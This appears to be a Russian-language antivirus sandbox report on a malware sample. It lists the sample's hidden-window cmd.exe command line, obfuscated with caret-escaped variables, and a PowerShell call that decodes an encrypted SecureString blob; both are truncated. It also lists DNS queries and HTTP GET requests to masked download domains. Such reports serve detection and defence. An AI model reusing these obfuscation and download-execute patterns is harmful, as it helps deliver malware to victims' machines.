Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' PjZhwkRmLvIV kuBOstSubnwbEjtViWBVUBJzk lFhbHkVGdwMO & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AoTwTfJMXoRmDbA%=HLjHTnASiStjk&&set %RNdsSbmUQzcAhN%=p&&set %k...
Сетевая активность
Подключается к
- 'sh###tuff.co.uk':443
- 'la##cat.net':80
- 'j-##chi.com':80
- 'pi####studio.com':80
- 'ja###flames.com':80
- 'ja###flames.com':443
TCP
Запросы HTTP GET
- http://la##cat.net/ShkC/
- http://j-##chi.com/kFDfMsR/
- http://pi####studio.com/xq6q/
- http://ja###flames.com/7GMD/
Другие
- 'sh###tuff.co.uk':443
- 'ja###flames.com':443
UDP
- DNS ASK sh###tuff.co.uk
- DNS ASK la##cat.net
- DNS ASK j-##chi.com
- DNS ASK pi####studio.com
- DNS ASK ja###flames.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' PjZhwkRmLvIV kuBOstSubnwbEjtViWBVUBJzk lFhbHkVGdwMO & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AoTwTfJMXoRmDbA%=HLjHTnASiStjk&&set %RNdsSbmUQzcAhN%=p&&set %k...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "([ruNTImE.iNteROpserVICES.marsHAL]::([ruNTIME.iNterOPServIcES.maRSHaL].GeTmEmbERs()[0].nAME).inVOkE([ruNTIME.INTeropsErvIcES.mArSHAL]::SecUrestrinGToglobalAlloCanSi($('76492d1116743f0423413b16...
